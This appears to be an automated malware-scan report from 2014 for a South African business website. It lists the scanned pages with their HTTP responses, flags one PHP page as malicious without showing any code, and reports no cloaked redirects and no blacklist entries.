Scanned pages/files
Request | Server response | Status |
http://tlousolutions.co.za/ | HTTP/1.1 200 OK Connection: close Date: Sat, 04 Oct 2014 19:10:39 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html X-Powered-By: PHP/5.4.4-14+deb7u14 | clean |
http://www.tlousolutions.co.za/new/default.php | 200 OK Content-Length: 14460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://www.tlousolutions.co.za/new/content/content_cataloguelist.php | 200 OK Content-Length: 1386 Content-Type: text/html | clean |
http://www.tlousolutions.co.za/new/content/ewp.js | 200 OK Content-Length: 27272 Content-Type: application/x-javascript | clean |
http://www.tlousolutions.co.za/test404page.js | 404 Not Found Content-Length: 281 Content-Type: text/html | clean |
http://tlousolutions.co.za/photos/ | 404 Not Found Content-Length: 274 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tlousolutions.co.za
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 19:10:39 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.4.4-14+deb7u14
Second query (visit from search engine):
GET / HTTP/1.1
Host: tlousolutions.co.za
Referer: http://www.google.com/search?q=tlousolutions.co.za
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tlousolutions.co.za
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tlousolutions.co.za/
Result: tlousolutions.co.za is not infected or malware details are not published yet.